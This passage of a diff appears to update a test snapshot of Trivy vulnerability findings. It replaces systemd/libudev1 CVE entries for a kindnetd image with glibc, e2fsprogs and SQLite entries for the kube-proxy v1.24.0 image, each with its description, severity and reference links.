'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://ubuntu.com/security/CVE-2019-1010025", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", - }, - { - "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], "severity": "LOW", @@ -146758,6815 +148394,5542 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1304", + "installedVersion": "1.46.2-2", + "packageName": "libcom-err2", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "https://access.redhat.com/errata/RHSA-2022:8361", + "https://access.redhat.com/security/cve/CVE-2022-1304", + "https://bugzilla.redhat.com/2069726", + "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "https://errata.rockylinux.org/RLSA-2022:8361", + "https://linux.oracle.com/cve/CVE-2022-1304.html", + "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "https://ubuntu.com/security/notices/USN-5464-1", + "https://www.cve.org/CVERecord?id=CVE-2022-1304", ], }, "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", + "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", + "value": "https://avd.aquasec.com/nvd/cve-2022-1304", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8361", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", + "value": "https://access.redhat.com/security/cve/CVE-2022-1304", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "value": "https://bugzilla.redhat.com/2069726", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "value": "https://errata.rockylinux.org/RLSA-2022:8361", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "value": "https://ubuntu.com/security/notices/USN-5464-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.8", + "packageName": "libdb5.3", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": 